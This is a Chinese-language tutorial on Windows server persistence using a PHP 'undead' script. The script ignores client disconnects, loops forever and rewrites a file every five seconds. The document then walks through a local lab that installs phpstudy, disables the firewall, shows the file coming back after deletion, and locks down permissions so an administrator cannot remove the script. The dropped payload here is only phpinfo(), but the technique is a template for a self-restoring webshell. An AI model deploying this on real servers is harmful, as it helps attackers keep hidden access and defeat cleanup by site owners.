Windows权限维持之不死马(一)
1.php不死马权限维持
<?php
ignore_user_abort(); //关掉浏览器,PHP脚本也可以继续执行 .
set_time_limit(0);//通过set_time_limit(0)可以让程序无限制的执行下去
$interval = 5; // 每隔*秒运行
do {
$filename = 'test.php';
if(file_exists($filename)) {
echo "xxx";
}
else {
$file = fopen("test.php", "w");
$txt = "<?php phpinfo();?>\n";
fwrite($file, $txt);
fclose($file);
}
sleep($interval);
} while (true);
?>
这段代码的意思是就是 只要访问一次1.php文件 该目录下就会生成test.php文件 每五秒执行一次
首先我们先打开12server10
输入ipconfig
IP 是 192.168.25.149
我们需要配置phpstudy环境
双击进行安装
我们顺便关闭防火墙
把这个server服务也要关闭掉
避免一直弹框
然后我们安装好 我们要启动apache mysql 服务
我们输入 12server10 的ip 地址
192.168.25.149
说明我们安装成功
然后我们在根目录下新建一个文件 1.php
我们在网址访问
http://192.168.25.149/1.php
然后我们返回根目录下 发现已经生成了
我们把他进行删除
发现五秒之后 他又回来了
除非你把 apache服务 停止 他就不会再生成了
我们也可以把
然后我们也就 看不到了
但是我们还是可以访问到这个文件的
http://192.168.25.149/1.php
这个目录下还是可以生成的
然后我们还是可以修改文件的属性的
我们直接修改system的权限 修改为不能够修改
我们现在是administrator 登陆的
所以我们现在修改他的权限
然后我们现在删除1.php文件
我们点击重试
还是会弹出这个弹窗 说明我们修改成功了